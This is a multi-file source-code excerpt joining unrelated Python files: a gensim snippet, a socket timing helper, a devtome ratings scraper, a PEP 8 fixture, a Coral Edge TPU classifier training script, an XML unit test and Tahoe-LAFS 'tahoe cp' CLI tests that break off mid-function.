new_vec = dictionary.doc2bow(new_doc.lower().split())
print "we are printing the new vec"
print(new_vec)
corpus = [dictionary.doc2bow(text) for text in text_all_nf]
corpora.MmCorpus.serialize('user_input.mm',corpus)
id2word = dictionary
mm = corpus
#lda = gensim.models.ldamodel.LdaModel(corpus=mm,id2word = id2word,num_topics=10,update_every=0,chunksize=10, passes=20)
#lda.print_topics(10)
| leahrnh/ticktock_text_api | word2vec/user_input_word_all.py | Python | gpl-2.0 | 3,290 |
import socket
import sys
import time
from urlparse import urlparse
# Default ports for schemes that imply one, used when the URL carries no
# explicit :port component.
SCHEME_PORT_MAP = {'http': 80,
                   'https': 443}
def time_connect(url):
    """Return time in seconds to connect to socket of url,
    or very large number if error in connection"""
    parsed = urlparse(url)
    if parsed.port:
        port = parsed.port
    else:
        try:
            # Dict lookups raise KeyError; the original caught IndexError,
            # so an unknown scheme escaped as a bare KeyError instead of
            # this friendlier message.
            port = SCHEME_PORT_MAP[parsed.scheme]
        except KeyError:
            raise Exception('url must specify port')
    host = parsed.netloc.split(':')[0]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    time_before = time.time()
    try:
        sock.connect((host, port))
    except socket.error:
        # Connection failed: report an effectively infinite time so this
        # url always loses a "fastest" comparison.  Close the socket --
        # the original leaked it on this path.
        sock.close()
        return sys.float_info.max
    result = time.time() - time_before
    sock.close()
    return result
def fastest(urls):
    """Return (time, url) tuple of shortest time for all urls"""
    # min() is O(n) and avoids materializing and sorting the whole list
    # just to take its first element.  Ties are still broken by comparing
    # the url strings, exactly as tuple ordering did before.
    return min((time_connect(u), u) for u in urls)
| quaddra/engage | python_pkg/engage/utils/socktime.py | Python | apache-2.0 | 934 |
#!/usr/bin/env python
import json, web, urllib2, re
db = json.load(open("db.access"))
db = web.database(dbn=str(db['type']), db=str(db['name']), user=str(db['user']), pw=str(db['pass']))
def build_rating_db():
    """Scrape devtome rater pages and rebuild the `ratings` table.

    Steps: (1) collect (rater-name, rater-page-url) pairs from the
    round-27 CSV (which used a special "Rater" format) and from each later
    round's CSV ("Rating Comments" format), (2) scrape every rater page
    for per-article ratings, (3) wipe and repopulate the ratings table
    inside a single transaction.
    """
    debug = False
    if debug: print "Processing account_27"
    path = "http://raw2.github.com/Unthinkingbit/charity/master/account_27.csv"
    response = urllib2.urlopen(path).read()
    result = response.split('\n')
    rater_lines = []
    for row in result:
        if "Rater" in row:
            subrow = []
            subrow.append(row.split(',')[0])
            for item in row.split(','):
                if "Rater" in item:
                    # Pull the URL out of the trailing "(...)" group.
                    url = re.sub(r'^.*\(', "", item)
                    url = re.sub(r'\)$', "", url)
                    subrow.append(url)
            rater_lines.append(subrow)
    # 27 was a special case, after that it was different written
    # get round number
    if debug: print "Getting round off dvccountdown"
    path = "http://dvccountdown.blisteringdevelopers.com"
    result = urllib2.urlopen(path).read().split('\n')
    startround = 28
    endround = 28
    for row in result:
        if "<th>Round" in row:
            # Current round from the countdown page; +1 makes range() below
            # include it.
            endround = int(re.sub(r'^.*Round ', "", row)) + 1
            break
    if debug: print "startround: %d\tround received: %d" % (startround, endround)
    for i in range(startround, endround):
        if debug: print "Processing round %d" % i
        path = "http://raw2.github.com/Unthinkingbit/charity/master/account_"+str(i)+".csv"
        try:
            result = urllib2.urlopen(path).read().split('\n')
            for row in result:
                if "Rating Comments" in row:
                    subrow = []
                    subrow.append(row.split(',')[0])
                    for item in row.split(','):
                        if "Rating Comments" in item:
                            url = re.sub(r'^.*\(', "", item)
                            url = re.sub(r'\)$', "", url)
                            subrow.append(url)
                    rater_lines.append(subrow)
        except:
            # NOTE(review): bare except deliberately skips rounds whose CSV
            # is missing/unfetchable, but it also hides real errors.
            pass
    if debug:
        for row in rater_lines:
            print row
    if debug: print "Processing devtome rater_pages"
    t = db.transaction()
    try:
        # first clear the database
        db.query("delete from ratings")
        for rater_page in rater_lines:
            result = urllib2.urlopen(rater_page[1]).read().split('\n')
            if debug: print "accessing %s" % rater_page[1]
            for row in result:
                if '<div class="li"><a href="http://devtome.com/doku.php?id=wiki:user:' in row:
                    # get author
                    author = re.sub(r'<li class="level[0,1]?"><div class="li"><a href="http://devtome.com/doku.php\?id=wiki:user:', '', row)
                    author = author.split('"')[0]
                    # get article_url
                    article_url = re.sub(r'^.*, <a href="http://devtome.com/doku.php\?id=', "http://devtome.com/doku.php?id=", row)
                    article_url = article_url.split('"')[0]
                    #create the author url
                    author_url = 'http://devtome.com/doku.php?id=wiki:user:'+author
                    # extract the rating
                    rating = re.sub(r'^.*</a>:[ ]*', "", row)
                    rating = re.sub(r'[ ]*</div>', "", rating)
                    rating = re.sub(r' - ', " ", rating)
                    rating = rating.split(" ", 1)
                    if len(rating) > 1: comment = rating[1]
                    else: comment = ""
                    rating = rating[0]
                    # store in db
                    db.query("insert into ratings (rater, rater_url, author_url, article_url, author, rating, comment) values ($rater, $rater_url, $author_url, $article_url, $author, $rating, $comment)", vars={'rater':rater_page[0], 'rater_url':rater_page[1], 'author_url':author_url, 'article_url':article_url, 'author':author, 'rating':rating, 'comment':comment})
    except:
        # Any failure rolls the whole rebuild back and re-raises.
        t.rollback()
        raise
    else:
        t.commit()
def GetRatingsByAuthor(author):
    """Return all rating rows for `author` as a list.

    Database errors propagate to the caller.  (The original wrapped the
    query in a bare except that only reset a local variable and then
    immediately re-raised, which had no observable effect.)
    """
    # Parameterized query: `author` is bound by web.py, not interpolated.
    results = db.query('select * from ratings where author = $author',
                       vars={'author': author})
    return [row for row in results]
if __name__ == "__main__":
    # run the db_update
    # Rebuild the ratings table from scratch when executed directly.
    build_rating_db()
| hunterbunter/dvccountdown | modules/ratings.py | Python | gpl-3.0 | 3,672 |
# NOTE(review): this appears to be a formatting fixture (expected output of
# a PEP 8 "whitespace around operator" fixer) rather than runnable code --
# many names below (i, submitted, x, y, a, b, spam, alpha, baz, kwargs) are
# intentionally undefined.  TODO confirm before changing its content.
foo = 23 + 3
foo = 4 + 5
foo = 4 + 5
foo = 4 + 5
foo = 4 + 5
i = i + 1
submitted += 1
x = x * 2 - 1
hypot2 = x * x + y * y
c = (a + b) * (a - b)
foo(bar, key='word', *args, **kwargs)
foo(bar, key='word', *args, **kwargs)
x = (3 +
     2)
x = (3
     + 2)
x = 3 + \
    2
x = 3 + \
    2
def func(foo, bar='tester'):
    return 5
def func(foo, bar='tester'):
    return 5
baz(**kwargs)
negative = -1
spam(-1)
alpha[:-i]
if not -5 < x < +5:
    pass
lambda *args, **kw: (args, kw)
lambda *args, **kw: (args, kw)
i = i + 1
submitted += 1
x = x * 2 - 1
hypot2 = x * x + y * y
c = (a + b) * (a - b)
c = alpha - 4
z = x ** y
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tflite_runtime.interpreter import load_delegate
from tflite_runtime.interpreter import Interpreter
import glob
import os
import subprocess
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.preprocessing.image import ImageDataGenerator
# Model input geometry: 224x224 RGB, the native MobileNetV2 resolution.
input_size = (224, 224)
input_shape = (224, 224, 3)
batch_size = 1
###########################################################################################
# Load pretrained model
###########################################################################################
base_model = tf.keras.applications.MobileNetV2(input_shape=input_shape,
                                               include_top=False,
                                               classifier_activation='softmax',
                                               weights='imagenet')
# Freeze first 100 layers
base_model.trainable = True
for layer in base_model.layers[:100]:
    layer.trainable = False
# New head: small conv + global pooling + 2-class softmax classifier.
model = tf.keras.Sequential([
    base_model,
    tf.keras.layers.Conv2D(filters=32, kernel_size=3, activation='relu'),
    tf.keras.layers.Dropout(0.2),
    tf.keras.layers.GlobalAveragePooling2D(),
    tf.keras.layers.Dense(units=2, activation='softmax')
])
model.compile(loss='categorical_crossentropy',
              optimizer=tf.keras.optimizers.RMSprop(lr=1e-5),
              metrics=['accuracy'])
print(model.summary())
###########################################################################################
# Prepare Datasets
###########################################################################################
# Training images get heavy augmentation; validation only gets rescaling.
train_datagen = ImageDataGenerator(rescale=1./255,
                                   zoom_range=0.3,
                                   rotation_range=50,
                                   width_shift_range=0.2,
                                   height_shift_range=0.2,
                                   shear_range=0.2,
                                   horizontal_flip=True,
                                   fill_mode='nearest')
val_datagen = ImageDataGenerator(rescale=1./255)
dataset_path = './dataset'
train_set_path = os.path.join(dataset_path, 'train')
val_set_path = os.path.join(dataset_path, 'test')
# NOTE: rebinds the batch_size=1 defined above; training uses batches of 64.
batch_size = 64
train_generator = train_datagen.flow_from_directory(train_set_path,
                                                    target_size=input_size,
                                                    batch_size=batch_size,
                                                    class_mode='categorical')
val_generator = val_datagen.flow_from_directory(val_set_path,
                                                target_size=input_size,
                                                batch_size=batch_size,
                                                class_mode='categorical')
epochs = 15
history = model.fit(train_generator,
                    steps_per_epoch=train_generator.n // batch_size,
                    epochs=epochs,
                    validation_data=val_generator,
                    validation_steps=val_generator.n // batch_size,
                    verbose=1)
###########################################################################################
# Plotting Train Data
###########################################################################################
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
plt.figure(figsize=(8, 8))
plt.subplot(2, 1, 1)
plt.plot(acc, label='Training Accuracy')
plt.plot(val_acc, label='Validation Accuracy')
plt.legend(loc='lower right')
plt.ylabel('Accuracy')
plt.ylim([min(plt.ylim()), 1])
plt.title('Training and Validation Accuracy')
plt.subplot(2, 1, 2)
plt.plot(loss, label='Training Loss')
plt.plot(val_loss, label='Validation Loss')
plt.legend(loc='upper right')
plt.ylabel('Cross Entropy')
plt.ylim([0, 1.0])
plt.title('Training and Validation Loss')
plt.xlabel('epoch')
# plt.show()
plt.savefig('history.png')
###########################################################################################
# Post Training Quantization
###########################################################################################
def representative_data_gen():
    """Yield ~100 preprocessed sample images for post-training quantization.

    The TFLite converter runs these through the float model to calibrate
    the int8 quantization ranges.
    """
    dataset_list = tf.data.Dataset.list_files('./dataset/test/*/*')
    for i in range(100):
        # NOTE(review): a fresh iterator is built on every pass, so each
        # sample is the first element of a (re)shuffled listing -- TODO
        # confirm list_files shuffling makes these 100 distinct files.
        image = next(iter(dataset_list))
        image = tf.io.read_file(image)
        image = tf.io.decode_jpeg(image, channels=3)
        image = tf.image.resize(image, input_size)
        # Same preprocessing as training: scale to [0, 1] floats.
        image = tf.cast(image / 255., tf.float32)
        image = tf.expand_dims(image, 0)
        yield [image]
# Pin the batch dimension to 1 -- the Edge TPU compiler needs a static shape.
model.input.set_shape((1,) + model.input.shape[1:])
converter = tf.lite.TFLiteConverter.from_keras_model(model)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.representative_dataset = representative_data_gen
# Full-integer quantization: int8 ops only, uint8 input/output tensors.
converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS_INT8]
converter.target_spec.supported_types = [tf.int8]
converter.inference_input_type = tf.uint8
converter.inference_output_type = tf.uint8
tflite_model = converter.convert()
###########################################################################################
# Saving models
###########################################################################################
model.save('classifier.h5')
with open('classifier.tflite', 'wb') as f:
    f.write(tflite_model)
###########################################################################################
# Evaluating h5
###########################################################################################
# Grab one validation batch and record labels for the deployed model.
batch_images, batch_labels = next(val_generator)
labels = '\n'.join(sorted(train_generator.class_indices.keys()))
with open('classifier_labels.txt', 'w') as f:
    f.write(labels)
logits = model(batch_images)
prediction = np.argmax(logits, axis=1)
truth = np.argmax(batch_labels, axis=1)
keras_accuracy = tf.keras.metrics.Accuracy()
keras_accuracy(prediction, truth)
def set_input_tensor(interpreter, input):
    """Quantize `input` and copy it into the interpreter's input tensor.

    The float image is mapped into the tensor's uint8 space via the
    tensor's (scale, zero_point) quantization parameters.
    """
    details = interpreter.get_input_details()[0]
    # tensor() returns a callable view; [0] drops the batch dimension.
    tensor = interpreter.tensor(details['index'])()[0]
    scale, zero_point = details['quantization']
    # real_value = scale * (quantized - zero_point), inverted here.
    tensor[:, :] = np.uint8(input / scale + zero_point)
def classify_image(interpreter, input):
    """Run one inference on *input* and return the top-1 class index."""
    set_input_tensor(interpreter, input)
    interpreter.invoke()
    details = interpreter.get_output_details()[0]
    raw = interpreter.get_tensor(details['index'])
    scale, zero_point = details['quantization']
    # De-quantize the scores before taking the argmax.
    scores = scale * (raw - zero_point)
    return np.argmax(scores)
interpreter = tf.lite.Interpreter('classifier.tflite')
interpreter.allocate_tensors()
# Collect all inference predictions in a list
batch_prediction = []
batch_truth = np.argmax(batch_labels, axis=1)
for i in range(len(batch_images)):
    prediction = classify_image(interpreter, batch_images[i])
    batch_prediction.append(prediction)
# Compare all predictions to the ground truth
tflite_accuracy = tf.keras.metrics.Accuracy()
tflite_accuracy(batch_prediction, batch_truth)
###########################################################################################
# Compiles model
###########################################################################################
# Produces classifier_edgetpu.tflite next to the input model; requires the
# edgetpu_compiler binary to be on PATH.
subprocess.call(["edgetpu_compiler",
                 "--show_operations",
                 "classifier.tflite"])
###########################################################################################
# Evaluating tflite
###########################################################################################
# NOTE(review): Interpreter / load_delegate are presumably the tflite_runtime
# versions imported earlier in this script -- confirm. Running this step needs
# an attached Edge TPU (libedgetpu delegate).
interpreter = Interpreter('classifier_edgetpu.tflite', experimental_delegates=[
    load_delegate('libedgetpu.so.1.0')])
interpreter.allocate_tensors()
# Collect all inference predictions in a list
batch_prediction = []
batch_truth = np.argmax(batch_labels, axis=1)
for i in range(len(batch_images)):
    prediction = classify_image(interpreter, batch_images[i])
    batch_prediction.append(prediction)
# Compare all predictions to the ground truth
edgetpu_tflite_accuracy = tf.keras.metrics.Accuracy()
edgetpu_tflite_accuracy(batch_prediction, batch_truth)
###########################################################################################
# Show Results
###########################################################################################
print("Raw model accuracy: {:.2%}".format(keras_accuracy.result()))
print("Quant TF Lite accuracy: {:.2%}".format(tflite_accuracy.result()))
print("EdgeTpu Quant TF Lite accuracy: {:.2%}".format(
    edgetpu_tflite_accuracy.result()))
| google-coral/demo-manufacturing | models/retraining/train_classifier.py | Python | apache-2.0 | 9,469 |
# Copyright 2016 Leon Poon and Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from xml.dom import minidom
from test import res
dtsx_res = res.pydtsxplode.dtsx # @UndefinedVariable
class TestXml(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testMakeXmlNs(self):
pass
def testReadPackage(self):
f = dtsx_res['Package.dtsx']('rb')
dom = minidom.parse(f)
self.assertIs(dom.documentElement.ownerDocument, dom)
self.assertIs(dom.documentElement.parentNode, dom)
# Allow running this test module directly, outside a test runner.
if __name__ == "__main__":
    unittest.main()
| LeonPoon/XMLExplode | src-test/test/xmlxplode/test_xml_walk.py | Python | apache-2.0 | 1,191 |
import os.path, simplejson
from twisted.trial import unittest
from twisted.python import usage
from twisted.internet import defer
from allmydata.scripts import cli
from allmydata.util import fileutil
from allmydata.util.encodingutil import (quote_output, get_io_encoding,
unicode_to_output, to_str)
from allmydata.util.assertutil import _assert
from .no_network import GridTestMixin
from .test_cli import CLITestMixin
timeout = 480 # deep_check takes 360s on Zandr's linksys box, others take > 240s
class Cp(GridTestMixin, CLITestMixin, unittest.TestCase):
def test_not_enough_args(self):
o = cli.CpOptions()
self.failUnlessRaises(usage.UsageError,
o.parseOptions, ["onearg"])
def test_unicode_filename(self):
self.basedir = "cli/Cp/unicode_filename"
fn1 = os.path.join(unicode(self.basedir), u"\u00C4rtonwall")
try:
fn1_arg = fn1.encode(get_io_encoding())
artonwall_arg = u"\u00C4rtonwall".encode(get_io_encoding())
except UnicodeEncodeError:
raise unittest.SkipTest("A non-ASCII command argument could not be encoded on this platform.")
self.skip_if_cannot_represent_filename(fn1)
self.set_up_grid()
DATA1 = "unicode file content"
fileutil.write(fn1, DATA1)
fn2 = os.path.join(self.basedir, "Metallica")
DATA2 = "non-unicode file content"
fileutil.write(fn2, DATA2)
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda res: self.do_cli("cp", fn1_arg, "tahoe:"))
d.addCallback(lambda res: self.do_cli("get", "tahoe:" + artonwall_arg))
d.addCallback(lambda (rc,out,err): self.failUnlessReallyEqual(out, DATA1))
d.addCallback(lambda res: self.do_cli("cp", fn2, "tahoe:"))
d.addCallback(lambda res: self.do_cli("get", "tahoe:Metallica"))
d.addCallback(lambda (rc,out,err): self.failUnlessReallyEqual(out, DATA2))
d.addCallback(lambda res: self.do_cli("ls", "tahoe:"))
def _check((rc, out, err)):
try:
unicode_to_output(u"\u00C4rtonwall")
except UnicodeEncodeError:
self.failUnlessReallyEqual(rc, 1)
self.failUnlessReallyEqual(out, "Metallica\n")
self.failUnlessIn(quote_output(u"\u00C4rtonwall"), err)
self.failUnlessIn("files whose names could not be converted", err)
else:
self.failUnlessReallyEqual(rc, 0)
self.failUnlessReallyEqual(out.decode(get_io_encoding()), u"Metallica\n\u00C4rtonwall\n")
self.failUnlessReallyEqual(err, "")
d.addCallback(_check)
return d
def test_dangling_symlink_vs_recursion(self):
if not hasattr(os, 'symlink'):
raise unittest.SkipTest("Symlinks are not supported by Python on this platform.")
# cp -r on a directory containing a dangling symlink shouldn't assert
self.basedir = "cli/Cp/dangling_symlink_vs_recursion"
self.set_up_grid()
dn = os.path.join(self.basedir, "dir")
os.mkdir(dn)
fn = os.path.join(dn, "Fakebandica")
ln = os.path.join(dn, "link")
os.symlink(fn, ln)
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda res: self.do_cli("cp", "--recursive",
dn, "tahoe:"))
return d
def test_copy_using_filecap(self):
self.basedir = "cli/Cp/test_copy_using_filecap"
self.set_up_grid()
outdir = os.path.join(self.basedir, "outdir")
os.mkdir(outdir)
fn1 = os.path.join(self.basedir, "Metallica")
fn2 = os.path.join(outdir, "Not Metallica")
fn3 = os.path.join(outdir, "test2")
DATA1 = "puppies" * 10000
fileutil.write(fn1, DATA1)
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda ign: self.do_cli("put", fn1))
def _put_file((rc, out, err)):
self.failUnlessReallyEqual(rc, 0)
self.failUnlessIn("200 OK", err)
# keep track of the filecap
self.filecap = out.strip()
d.addCallback(_put_file)
# Let's try copying this to the disk using the filecap.
d.addCallback(lambda ign: self.do_cli("cp", self.filecap, fn2))
def _copy_file((rc, out, err)):
self.failUnlessReallyEqual(rc, 0)
results = fileutil.read(fn2)
self.failUnlessReallyEqual(results, DATA1)
d.addCallback(_copy_file)
# Test copying a filecap to local dir, which should fail without a
# destination filename (#761).
d.addCallback(lambda ign: self.do_cli("cp", self.filecap, outdir))
def _resp((rc, out, err)):
self.failUnlessReallyEqual(rc, 1)
self.failUnlessIn("when copying into a directory, all source files must have names, but",
err)
self.failUnlessReallyEqual(out, "")
d.addCallback(_resp)
# Create a directory, linked at tahoe:test .
d.addCallback(lambda ign: self.do_cli("mkdir", "tahoe:test"))
def _get_dir((rc, out, err)):
self.failUnlessReallyEqual(rc, 0)
self.dircap = out.strip()
d.addCallback(_get_dir)
# Upload a file to the directory.
d.addCallback(lambda ign:
self.do_cli("put", fn1, "tahoe:test/test_file"))
d.addCallback(lambda (rc, out, err): self.failUnlessReallyEqual(rc, 0))
# Copying DIRCAP/filename to a local dir should work, because the
# destination filename can be inferred.
d.addCallback(lambda ign:
self.do_cli("cp", self.dircap + "/test_file", outdir))
def _get_resp((rc, out, err)):
self.failUnlessReallyEqual(rc, 0)
results = fileutil.read(os.path.join(outdir, "test_file"))
self.failUnlessReallyEqual(results, DATA1)
d.addCallback(_get_resp)
# ... and to an explicit filename different from the source filename.
d.addCallback(lambda ign:
self.do_cli("cp", self.dircap + "/test_file", fn3))
def _get_resp2((rc, out, err)):
self.failUnlessReallyEqual(rc, 0)
results = fileutil.read(fn3)
self.failUnlessReallyEqual(results, DATA1)
d.addCallback(_get_resp2)
# Test that the --verbose option prints correct indices (#1805).
d.addCallback(lambda ign:
self.do_cli("cp", "--verbose", fn3, self.dircap))
def _test_for_wrong_indices((rc, out, err)):
lines = err.split('\n')
self.failUnlessIn('examining 1 of 1', lines)
self.failUnlessIn('starting copy, 1 files, 1 directories', lines)
self.failIfIn('examining 0 of', err)
d.addCallback(_test_for_wrong_indices)
return d
def test_cp_with_nonexistent_alias(self):
# when invoked with an alias or aliases that don't exist, 'tahoe cp'
# should output a sensible error message rather than a stack trace.
self.basedir = "cli/Cp/cp_with_nonexistent_alias"
self.set_up_grid()
d = self.do_cli("cp", "fake:file1", "fake:file2")
def _check((rc, out, err)):
self.failUnlessReallyEqual(rc, 1)
self.failUnlessIn("error:", err)
d.addCallback(_check)
# 'tahoe cp' actually processes the target argument first, so we need
# to check to make sure that validation extends to the source
# argument.
d.addCallback(lambda ign: self.do_cli("create-alias", "tahoe"))
d.addCallback(lambda ign: self.do_cli("cp", "fake:file1",
"tahoe:file2"))
d.addCallback(_check)
return d
def test_unicode_dirnames(self):
self.basedir = "cli/Cp/unicode_dirnames"
fn1 = os.path.join(unicode(self.basedir), u"\u00C4rtonwall")
try:
fn1_arg = fn1.encode(get_io_encoding())
del fn1_arg # hush pyflakes
artonwall_arg = u"\u00C4rtonwall".encode(get_io_encoding())
except UnicodeEncodeError:
raise unittest.SkipTest("A non-ASCII command argument could not be encoded on this platform.")
self.skip_if_cannot_represent_filename(fn1)
self.set_up_grid()
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda res: self.do_cli("mkdir", "tahoe:test/" + artonwall_arg))
d.addCallback(lambda res: self.do_cli("cp", "-r", "tahoe:test", "tahoe:test2"))
d.addCallback(lambda res: self.do_cli("ls", "tahoe:test2/test"))
def _check((rc, out, err)):
try:
unicode_to_output(u"\u00C4rtonwall")
except UnicodeEncodeError:
self.failUnlessReallyEqual(rc, 1)
self.failUnlessReallyEqual(out, "")
self.failUnlessIn(quote_output(u"\u00C4rtonwall"), err)
self.failUnlessIn("files whose names could not be converted", err)
else:
self.failUnlessReallyEqual(rc, 0)
self.failUnlessReallyEqual(out.decode(get_io_encoding()), u"\u00C4rtonwall\n")
self.failUnlessReallyEqual(err, "")
d.addCallback(_check)
return d
def test_cp_replaces_mutable_file_contents(self):
self.basedir = "cli/Cp/cp_replaces_mutable_file_contents"
self.set_up_grid()
# Write a test file, which we'll copy to the grid.
test_txt_path = os.path.join(self.basedir, "test.txt")
test_txt_contents = "foo bar baz"
f = open(test_txt_path, "w")
f.write(test_txt_contents)
f.close()
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda ignored:
self.do_cli("mkdir", "tahoe:test"))
# We have to use 'tahoe put' here because 'tahoe cp' doesn't
# know how to make mutable files at the destination.
d.addCallback(lambda ignored:
self.do_cli("put", "--mutable", test_txt_path, "tahoe:test/test.txt"))
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test/test.txt"))
def _check((rc, out, err)):
self.failUnlessEqual(rc, 0)
self.failUnlessEqual(out, test_txt_contents)
d.addCallback(_check)
# We'll do ls --json to get the read uri and write uri for the
# file we've just uploaded.
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test/test.txt"))
def _get_test_txt_uris((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "filenode")
self.failUnless(data['mutable'])
self.failUnlessIn("rw_uri", data)
self.rw_uri = to_str(data["rw_uri"])
self.failUnlessIn("ro_uri", data)
self.ro_uri = to_str(data["ro_uri"])
d.addCallback(_get_test_txt_uris)
# Now make a new file to copy in place of test.txt.
new_txt_path = os.path.join(self.basedir, "new.txt")
new_txt_contents = "baz bar foo" * 100000
f = open(new_txt_path, "w")
f.write(new_txt_contents)
f.close()
# Copy the new file on top of the old file.
d.addCallback(lambda ignored:
self.do_cli("cp", new_txt_path, "tahoe:test/test.txt"))
# If we get test.txt now, we should see the new data.
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test/test.txt"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, new_txt_contents))
# If we get the json of the new file, we should see that the old
# uri is there
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test/test.txt"))
def _check_json((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "filenode")
self.failUnless(data['mutable'])
self.failUnlessIn("ro_uri", data)
self.failUnlessEqual(to_str(data["ro_uri"]), self.ro_uri)
self.failUnlessIn("rw_uri", data)
self.failUnlessEqual(to_str(data["rw_uri"]), self.rw_uri)
d.addCallback(_check_json)
# and, finally, doing a GET directly on one of the old uris
# should give us the new contents.
d.addCallback(lambda ignored:
self.do_cli("get", self.rw_uri))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, new_txt_contents))
# Now copy the old test.txt without an explicit destination
# file. tahoe cp will match it to the existing file and
# overwrite it appropriately.
d.addCallback(lambda ignored:
self.do_cli("cp", test_txt_path, "tahoe:test"))
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test/test.txt"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, test_txt_contents))
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test/test.txt"))
d.addCallback(_check_json)
d.addCallback(lambda ignored:
self.do_cli("get", self.rw_uri))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, test_txt_contents))
# Now we'll make a more complicated directory structure.
# test2/
# test2/mutable1
# test2/mutable2
# test2/imm1
# test2/imm2
imm_test_txt_path = os.path.join(self.basedir, "imm_test.txt")
imm_test_txt_contents = test_txt_contents * 10000
fileutil.write(imm_test_txt_path, imm_test_txt_contents)
d.addCallback(lambda ignored:
self.do_cli("mkdir", "tahoe:test2"))
d.addCallback(lambda ignored:
self.do_cli("put", "--mutable", new_txt_path,
"tahoe:test2/mutable1"))
d.addCallback(lambda ignored:
self.do_cli("put", "--mutable", new_txt_path,
"tahoe:test2/mutable2"))
d.addCallback(lambda ignored:
self.do_cli('put', new_txt_path, "tahoe:test2/imm1"))
d.addCallback(lambda ignored:
self.do_cli("put", imm_test_txt_path, "tahoe:test2/imm2"))
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test2"))
def _process_directory_json((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "dirnode")
self.failUnless(data['mutable'])
self.failUnlessIn("children", data)
children = data['children']
# Store the URIs for later use.
self.childuris = {}
for k in ["mutable1", "mutable2", "imm1", "imm2"]:
self.failUnlessIn(k, children)
childtype, childdata = children[k]
self.failUnlessEqual(childtype, "filenode")
if "mutable" in k:
self.failUnless(childdata['mutable'])
self.failUnlessIn("rw_uri", childdata)
uri_key = "rw_uri"
else:
self.failIf(childdata['mutable'])
self.failUnlessIn("ro_uri", childdata)
uri_key = "ro_uri"
self.childuris[k] = to_str(childdata[uri_key])
d.addCallback(_process_directory_json)
# Now build a local directory to copy into place, like the following:
# test2/
# test2/mutable1
# test2/mutable2
# test2/imm1
# test2/imm3
def _build_local_directory(ignored):
test2_path = os.path.join(self.basedir, "test2")
fileutil.make_dirs(test2_path)
for fn in ("mutable1", "mutable2", "imm1", "imm3"):
fileutil.write(os.path.join(test2_path, fn), fn * 1000)
self.test2_path = test2_path
d.addCallback(_build_local_directory)
d.addCallback(lambda ignored:
self.do_cli("cp", "-r", self.test2_path, "tahoe:"))
# We expect that mutable1 and mutable2 are overwritten in-place,
# so they'll retain their URIs but have different content.
def _process_file_json((rc, out, err), fn):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "filenode")
if "mutable" in fn:
self.failUnless(data['mutable'])
self.failUnlessIn("rw_uri", data)
self.failUnlessEqual(to_str(data["rw_uri"]), self.childuris[fn])
else:
self.failIf(data['mutable'])
self.failUnlessIn("ro_uri", data)
self.failIfEqual(to_str(data["ro_uri"]), self.childuris[fn])
for fn in ("mutable1", "mutable2"):
d.addCallback(lambda ignored, fn=fn:
self.do_cli("get", "tahoe:test2/%s" % fn))
d.addCallback(lambda (rc, out, err), fn=fn:
self.failUnlessEqual(out, fn * 1000))
d.addCallback(lambda ignored, fn=fn:
self.do_cli("ls", "--json", "tahoe:test2/%s" % fn))
d.addCallback(_process_file_json, fn=fn)
# imm1 should have been replaced, so both its uri and content
# should be different.
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test2/imm1"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, "imm1" * 1000))
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test2/imm1"))
d.addCallback(_process_file_json, fn="imm1")
# imm3 should have been created.
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test2/imm3"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, "imm3" * 1000))
# imm2 should be exactly as we left it, since our newly-copied
# directory didn't contain an imm2 entry.
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test2/imm2"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, imm_test_txt_contents))
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test2/imm2"))
def _process_imm2_json((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
